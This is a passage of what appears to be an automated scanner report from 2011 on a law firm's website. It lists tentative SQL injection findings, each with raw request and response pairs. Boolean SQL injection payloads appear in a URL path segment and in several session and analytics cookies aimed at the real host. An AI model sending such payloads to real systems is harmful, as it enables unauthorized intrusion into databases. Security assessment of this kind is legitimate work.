<link rel="stylesheet" href="scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/sIFR-print.css" type="text/css" media="print" />
<link href="scripts/dropdowns.css" rel="stylesheet" type="text/css" media="all" />
<script language="javascript" src="scripts/sifr.js" type="text/javascript"></script>
<!--::404::-->
<style type="text/css">
<!--
body,td,th {
   font-family: Arial, Helvetica, sans-serif;
   font-size: 12px;
   color: #333333;
}

.TempBorderBG {
   background-color:#e8f1f6;
}
.TempHeaderBG {
   background-color:#7eadbf;
}
.underNav {
   background-color:#ece6b2;
}
.searchbox {
   background-color:#E8F1F6;
   margin:0px;
   width:98px;
   height:16px;
   border:0px;
   padding:0px;
   padding-top:5px;
   font-size: 11px;
   color:#818c90;
}

-->
</style>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script src="scripts/dropdowns.js" type="text/javascript"></script>
</head>

<body>
<table border="0" cellpadding="0" cellspacing="0">
   <tr>
       <td><img src="images/px.gif" alt="" width="20" height="20" /></td>
   </tr>
</table>
<table width="760" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td colspan="3" class="TempBorderBG"><img src="images/px.gif" alt="Fried Frank" width="1" height="10" /></td>
</tr>
<tr>
<td width="10" class="TempBorderBG"><img src="images/px.gif" alt="Fried Frank" width="10" height="1" /></td>
<td width="740" class="TempHeaderBG"><table width="740" border="0" cellspacing="0" cellpadding="0">
<tr>
<td colspan="3"><img src="images/px.gif" alt="Fried Frank" width="1" height="20" /></td>
</tr>
<tr>
<td width="20"><img src="images/px.gif" alt="Fried Frank" width="20" height="20" /></td>
<td width="700">
   <table width="700" border="0" cellspacing="0" ce
...[SNIP]...

1.68. http://www.friedfrank.com/flash/perpetua.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.friedfrank.com
Path:   /flash/perpetua.swf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flash'%20and%201%3d1--%20/perpetua.swf HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
Referer: http://www.friedfrank.com/index.cfm?pageID=42&itemID=1175
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; CFID=31349998; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.1.10.1303088795

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 06:19:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=31349998;path=/
Set-Cookie: CFTOKEN=88414738;path=/
Content-Type: text/html; charset=UTF-8


                                                                                                                                                           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o
...[SNIP]...
<title>Fried Frank &gt; Home</title>
<link rel="shortcut icon" type="image/ico" href="/
favicon.ico">
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/sIFR-print.css" type="text/css" media="print" />
<link href="scripts/dropdowns.css" rel="stylesheet" type="text/css" media="all" />
<script language="javascript" src="scripts/sifr.js" type="text/javascript"></script>
<!--::home::-->
<style type="text/css">
<!--
body,td,th {
   font-family: Arial, Helvetica, sans-serif;
   font-size: 12px;
   color: #333333;
}

.TempBorderBG {
   background-color:#e8f1f6;
}
.TempHeaderBG {
   background-color:#7eadbf;
}
.underNav {
   background-color:#ece6b2;
}
.searchbox {
   background-color:#E8F1F6;
   margin:0px;
   width:98px;
   height:16px;
   border:0px;
   padding:0px;
   padding-top:5px;
   font-size: 11px;
   color:#818c90;
}

-->
</style>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script src="scripts/dropdowns.js" type="text/javascript"></script>
</head>

<body>
<table border="0" cellpadding="0" cellspacing="0">
   <tr>
       <td><img src="images/px.gif" alt="" width="20" height="20" /></td>
   </tr>
</table>
<table width="760" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td colspan="3" class="TempBorderBG"><img src="images/px.gif" alt="Fried Frank" width="1" height="10" /></td>
</tr>
<tr>
<td width="10" class="TempBorderBG"><img src="images/px.gif" alt="Fried Frank" width="10" height="1" /></td>
<td width="740" class="TempHeaderBG"><table width="740" border="0" cellspacing="0" cellpadding="0">
<tr>
<td colspan="3"><img src="images/px.gif" alt="Fried Frank" width="1" height="20" /></td>
</tr>
<tr>
<td width="20"><img src="images/px.gif" alt="Fried Frank" width="20" height="20" /></td>
<td width="700">
   <table width="700" border="0" cellspacing="0" cellpadding
...[SNIP]...

Request 2

GET /flash'%20and%201%3d2--%20/perpetua.swf HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
Referer: http://www.friedfrank.com/index.cfm?pageID=42&itemID=1175
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; CFID=31349998; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.1.10.1303088795

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 06:19:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=31349998;path=/
Set-Cookie: CFTOKEN=88414738;path=/
Content-Type: text/html; charset=UTF-8


                                                                                                                                                           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o
...[SNIP]...
<title>Fried Frank &gt; Page Not Found</title>
<link rel="shortcut icon" type="image/ico" href="/
favicon.ico">
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/sIFR-print.css" type="text/css" media="print" />
<link href="scripts/dropdowns.css" rel="stylesheet" type="text/css" media="all" />
<script language="javascript" src="scripts/sifr.js" type="text/javascript"></script>
<!--::404::-->
<style type="text/css">
<!--
body,td,th {
   font-family: Arial, Helvetica, sans-serif;
   font-size: 12px;
   color: #333333;
}

.TempBorderBG {
   background-color:#e8f1f6;
}
.TempHeaderBG {
   background-color:#7eadbf;
}
.underNav {
   background-color:#ece6b2;
}
.searchbox {
   background-color:#E8F1F6;
   margin:0px;
   width:98px;
   height:16px;
   border:0px;
   padding:0px;
   padding-top:5px;
   font-size: 11px;
   color:#818c90;
}

-->
</style>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script src="scripts/dropdowns.js" type="text/javascript"></script>
</head>

<body>
<table border="0" cellpadding="0" cellspacing="0">
   <tr>
       <td><img src="images/px.gif" alt="" width="20" height="20" /></td>
   </tr>
</table>
<table width="760" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td colspan="3" class="TempBorderBG"><img src="images/px.gif" alt="Fried Frank" width="1" height="10" /></td>
</tr>
<tr>
<td width="10" class="TempBorderBG"><img src="images/px.gif" alt="Fried Frank" width="10" height="1" /></td>
<td width="740" class="TempHeaderBG"><table width="740" border="0" cellspacing="0" cellpadding="0">
<tr>
<td colspan="3"><img src="images/px.gif" alt="Fried Frank" width="1" height="20" /></td>
</tr>
<tr>
<td width="20"><img src="images/px.gif" alt="Fried Frank" width="20" height="20" /></td>
<td width="700">
   <table width="700" border="0" cellspacing="0" ce
...[SNIP]...

1.69. http://www.friedfrank.com/index.cfm [CFID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.friedfrank.com
Path:   /index.cfm

Issue detail

The CFID cookie appears to be vulnerable to SQL injection attacks. The payloads 73239711%20or%201%3d1--%20 and 73239711%20or%201%3d2--%20 were each submitted in the CFID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=42&itemID=729&more=1 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; CFID=3134999873239711%20or%201%3d1--%20; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.1.10.1303088795

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 21 Apr 2011 06:12:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=;expires=Wed, 21-Apr-2010 06:12:55 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=42&itemID=729&more=1 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; CFID=3134999873239711%20or%201%3d2--%20; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.1.10.1303088795

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 06:12:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=31397766;path=/
Set-Cookie: CFTOKEN=33204735;path=/
Content-Type: text/html; charset=UTF-8


       
   
   
   
   
   
   
   
   
   
   

   
   
   
   

   
   
   
   
   
               


   
   
   
   
   
   
   
   

       
   
   
   
   

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />


<META NAME="keywords" CONTENT="">
<META NAME="description" CONTENT="&lt;STRONG&gt;Ianis Girgenson &lt;/STRONG&gt;is an antitrust and competition law associate dividing his time between Fried Frank's London and Paris offices. He joined the Firm in 2006. &lt;BR&gt;&lt;BR&gt;Mr. Girgenson has represented numerous private and listed companies, as well as financial institutions before the European Commission and national authorities in merger control proceedings and in antitrust investigations. He has also been involved in antitrust-related litigation before the EU Court of First Instance and before national courts, including the French Conseil d'Etat.&lt;BR&gt;&lt;BR&gt;Prior to joining the Firm, Mr. Girgenson practiced competition law in Paris and Brussels.">

<meta name="verify-v1" content="L9ZLHht3G4Zc0L6/Gg2wdpu3oMGZLi1MmvGFU4K2HiU=" />

<title>Fried Frank &gt; Girgenson, Ianis </title>
<link rel="shortcut icon" type="image/ico" href="/
favicon.ico">
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/sIFR-print.css" type="text/css" media="print" />
<link href="scripts/dropdowns.css" rel="stylesheet" type="text/css" media="all" />
<script language="javascript" src="scripts/sifr.js" type="text/javascript"></scr
...[SNIP]...

1.70. http://www.friedfrank.com/index.cfm [CFTOKEN cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.friedfrank.com
Path:   /index.cfm

Issue detail

The CFTOKEN cookie appears to be vulnerable to SQL injection attacks. The payloads 78527363%20or%201%3d1--%20 and 78527363%20or%201%3d2--%20 were each submitted in the CFTOKEN cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=42&itemID=729&more=1 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; CFID=31349998; CFTOKEN=8841473878527363%20or%201%3d1--%20; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.1.10.1303088795

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 21 Apr 2011 06:13:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFTOKEN=;expires=Wed, 21-Apr-2010 06:13:13 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=42&itemID=729&more=1 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; CFID=31349998; CFTOKEN=8841473878527363%20or%201%3d2--%20; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.1.10.1303088795

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 06:13:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=31397828;path=/
Set-Cookie: CFTOKEN=10675553;path=/
Content-Type: text/html; charset=UTF-8


       
   
   
   
   
   
   
   
   
   
   

   
   
   
   

   
   
   
   
   
               


   
   
   
   
   
   
   
   

       
   
   
   
   

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />


<META NAME="keywords" CONTENT="">
<META NAME="description" CONTENT="&lt;STRONG&gt;Ianis Girgenson &lt;/STRONG&gt;is an antitrust and competition law associate dividing his time between Fried Frank's London and Paris offices. He joined the Firm in 2006. &lt;BR&gt;&lt;BR&gt;Mr. Girgenson has represented numerous private and listed companies, as well as financial institutions before the European Commission and national authorities in merger control proceedings and in antitrust investigations. He has also been involved in antitrust-related litigation before the EU Court of First Instance and before national courts, including the French Conseil d'Etat.&lt;BR&gt;&lt;BR&gt;Prior to joining the Firm, Mr. Girgenson practiced competition law in Paris and Brussels.">

<meta name="verify-v1" content="L9ZLHht3G4Zc0L6/Gg2wdpu3oMGZLi1MmvGFU4K2HiU=" />

<title>Fried Frank &gt; Girgenson, Ianis </title>
<link rel="shortcut icon" type="image/ico" href="/
favicon.ico">
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/sIFR-print.css" type="text/css" media="print" />
<link href="scripts/dropdowns.css" rel="stylesheet" type="text/css" media="all" />
<script language="javascript" src="scripts/sifr.js" type="text/javascript"></scr
...[SNIP]...

1.71. http://www.friedfrank.com/index.cfm [JSMOBILE cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.friedfrank.com
Path:   /index.cfm

Issue detail

The JSMOBILE cookie appears to be vulnerable to SQL injection attacks. The payloads 21264174%20or%201%3d1--%20 and 21264174%20or%201%3d2--%20 were each submitted in the JSMOBILE cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=42&itemID=729&more=1 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=021264174%20or%201%3d1--%20; CFID=31349998; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.1.10.1303088795

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 21 Apr 2011 06:12:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: JSMOBILE=;expires=Wed, 21-Apr-2010 06:12:37 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=42&itemID=729&more=1 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=021264174%20or%201%3d2--%20; CFID=31349998; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.1.10.1303088795

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 06:12:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=31349998;path=/
Set-Cookie: CFTOKEN=88414738;path=/
Content-Type: text/html; charset=UTF-8


       
   
   
   
   
   
   
   
   
   
   

   
   
   
   

   
   
   
   
   
               


   
   
   
   
   
   
   
   

       
   
   
   
   

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />


<META NAME="keywords" CONTENT="">
<META NAME="description" CONTENT="&lt;STRONG&gt;Ianis Girgenson &lt;/STRONG&gt;is an antitrust and competition law associate dividing his time between Fried Frank's London and Paris offices. He joined the Firm in 2006. &lt;BR&gt;&lt;BR&gt;Mr. Girgenson has represented numerous private and listed companies, as well as financial institutions before the European Commission and national authorities in merger control proceedings and in antitrust investigations. He has also been involved in antitrust-related litigation before the EU Court of First Instance and before national courts, including the French Conseil d'Etat.&lt;BR&gt;&lt;BR&gt;Prior to joining the Firm, Mr. Girgenson practiced competition law in Paris and Brussels.">

<meta name="verify-v1" content="L9ZLHht3G4Zc0L6/Gg2wdpu3oMGZLi1MmvGFU4K2HiU=" />

<title>Fried Frank &gt; Girgenson, Ianis </title>
<link rel="shortcut icon" type="image/ico" href="/
favicon.ico">
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/sIFR-print.css" type="text/css" media="print" />
<link href="scripts/dropdowns.css" rel="stylesheet" type="text/css" media="all" />
<script language="javascript" src="scripts/sifr.js" type="text/javascript"></scr
...[SNIP]...

1.72. http://www.friedfrank.com/index.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.friedfrank.com
Path:   /index.cfm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 46764192'%20or%201%3d1--%20 and 46764192'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm46764192'%20or%201%3d1--%20?pageID=2 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
Referer: http://www.friedfrank.com/index.cfm?pageID=42&itemID=729&more=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=31349998; CFTOKEN=88414738; __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.2.10.1303088795

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 06:37:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=31349998;path=/
Set-Cookie: CFTOKEN=88414738;path=/
Content-Type: text/html; charset=UTF-8


                                                                                                                                                           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o
...[SNIP]...
<title>Fried Frank &gt; Home</title>
<link rel="shortcut icon" type="image/ico" href="/
favicon.ico">
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/sIFR-print.css" type="text/css" media="print" />
<link href="scripts/dropdowns.css" rel="stylesheet" type="text/css" media="all" />
<script language="javascript" src="scripts/sifr.js" type="text/javascript"></script>
<!--::home::-->
<style type="text/css">
<!--
body,td,th {
   font-family: Arial, Helvetica, sans-serif;
   font-size: 12px;
   color: #333333;
}

.TempBorderBG {
   background-color:#e8f1f6;
}
.TempHeaderBG {
   background-color:#7eadbf;
}
.underNav {
   background-color:#ece6b2;
}
.searchbox {
   background-color:#E8F1F6;
   margin:0px;
   width:98px;
   height:16px;
   border:0px;
   padding:0px;
   padding-top:5px;
   font-size: 11px;
   color:#818c90;
}

-->
</style>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script src="scripts/dropdowns.js" type="text/javascript"></script>
</head>

<body>
<table border="0" cellpadding="0" cellspacing="0">
   <tr>
       <td><img src="images/px.gif" alt="" width="20" height="20" /></td>
   </tr>
</table>
<table width="760" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td colspan="3" class="TempBorderBG"><img src="images/px.gif" alt="Fried Frank" width="1" height="10" /></td>
</tr>
<tr>
<td width="10" class="TempBorderBG"><img src="images/px.gif" alt="Fried Frank" width="10" height="1" /></td>
<td width="740" class="TempHeaderBG"><table width="740" border="0" cellspacing="0" cellpadding="0">
<tr>
<td colspan="3"><img src="images/px.gif" alt="Fried Frank" width="1" height="20" /></td>
</tr>
<tr>
<td width="20"><img src="images/px.gif" alt="Fried Frank" width="20" height="20" /></td>
<td width="700">
   <table width="700" border="0" cellspacing="0" cellpadding
...[SNIP]...

Request 2

GET /index.cfm46764192'%20or%201%3d2--%20?pageID=2 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
Referer: http://www.friedfrank.com/index.cfm?pageID=42&itemID=729&more=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=31349998; CFTOKEN=88414738; __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.2.10.1303088795

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 06:37:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=31349998;path=/
Set-Cookie: CFTOKEN=88414738;path=/
Content-Type: text/html; charset=UTF-8


                                                                                                                                                           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o
...[SNIP]...
<title>Fried Frank &gt; Page Not Found</title>
<link rel="shortcut icon" type="image/ico" href="/
favicon.ico">
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/sIFR-print.css" type="text/css" media="print" />
<link href="scripts/dropdowns.css" rel="stylesheet" type="text/css" media="all" />
<script language="javascript" src="scripts/sifr.js" type="text/javascript"></script>
<!--::404::-->
<style type="text/css">
<!--
body,td,th {
   font-family: Arial, Helvetica, sans-serif;
   font-size: 12px;
   color: #333333;
}

.TempBorderBG {
   background-color:#e8f1f6;
}
.TempHeaderBG {
   background-color:#7eadbf;
}
.underNav {
   background-color:#ece6b2;
}
.searchbox {
   background-color:#E8F1F6;
   margin:0px;
   width:98px;
   height:16px;
   border:0px;
   padding:0px;
   padding-top:5px;
   font-size: 11px;
   color:#818c90;
}

-->
</style>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script src="scripts/dropdowns.js" type="text/javascript"></script>
</head>

<body>
<table border="0" cellpadding="0" cellspacing="0">
   <tr>
       <td><img src="images/px.gif" alt="" width="20" height="20" /></td>
   </tr>
</table>
<table width="760" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td colspan="3" class="TempBorderBG"><img src="images/px.gif" alt="Fried Frank" width="1" height="10" /></td>
</tr>
<tr>
<td width="10" class="TempBorderBG"><img src="images/px.gif" alt="Fried Frank" width="10" height="1" /></td>
<td width="740" class="TempHeaderBG"><table width="740" border="0" cellspacing="0" cellpadding="0">
<tr>
<td colspan="3"><img src="images/px.gif" alt="Fried Frank" width="1" height="20" /></td>
</tr>
<tr>
<td width="20"><img src="images/px.gif" alt="Fried Frank" width="20" height="20" /></td>
<td width="700">
   <table width="700" border="0" cellspacing="0" ce
...[SNIP]...

1.73. http://www.friedfrank.com/index.cfm [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.friedfrank.com
Path:   /index.cfm

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payloads 48537269'%20or%201%3d1--%20 and 48537269'%20or%201%3d2--%20 were each submitted in the __utma cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=42&itemID=729&more=1 HTTP/1.1
Host: www.friedfrank.com
